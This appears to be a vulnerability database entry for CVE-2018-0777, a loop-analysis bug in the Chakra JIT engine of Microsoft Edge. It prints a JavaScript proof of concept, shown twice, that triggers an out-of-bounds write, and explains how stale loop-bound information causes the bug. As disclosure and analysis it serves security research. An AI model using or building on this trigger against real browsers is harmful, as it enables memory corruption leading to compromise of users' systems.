Lucene search

RootSSV:97098
HistoryJan 22, 2018 - 12:00 a.m.

# Microsoft Edge: Chakra: JIT: Loop analysis bug(CVE-2018-0777)

2018-01-2200:00:00
Root
www.seebug.org
29

EPSS

0.951

Percentile

99.3%

Hereâs the PoC demonstrating OOB write.

function opt(arr, start, end) {
for (let i = start; i &lt; end; i++) {
if (i === 10) {
i += 0;  // &lt;&lt;-- (a)
}
arr[i] = 2.3023e-320;
}
}

function main() {
let arr = new Array(100);
arr.fill(1.1);

for (let i = 0; i &lt; 1000; i++)
opt(arr, 0, 3);

opt(arr, 0, 100000);
}

main();

What happens here is as follows:
In the loop prepass analysis, (a) is a valid add operation. Itâs a relative operation to âiâ, so Chakra thinks itâs a valid loop. The variable âiâ now becomes an induction variable, and a LoopCount object is created. When the LoopCount object is created, the ValueInfo of âiâ is IntBounded which contains relative bounds information.
In the actual optimization phase, (a) gets optimized and becomes a load operation which directly loads 10 to âiâ. Itâs no more relative operation, therefore the ValueInfo of âiâ is not to be IntBounded. But the LoopCount object has already been created with the previous information. This leads Chakra to fail computing bounds which may result in OOB read/write.

function opt(arr, start, end) {
for (let i = start; i < end; i++) {
if (i === 10) {
i += 0;  // <<-- (a)
}
arr[i] = 2.3023e-320;
}
}

function main() {
let arr = new Array(100);
arr.fill(1.1);

for (let i = 0; i < 1000; i++)
opt(arr, 0, 3);

opt(arr, 0, 100000);
}

main();

EPSS

0.951

Percentile

99.3%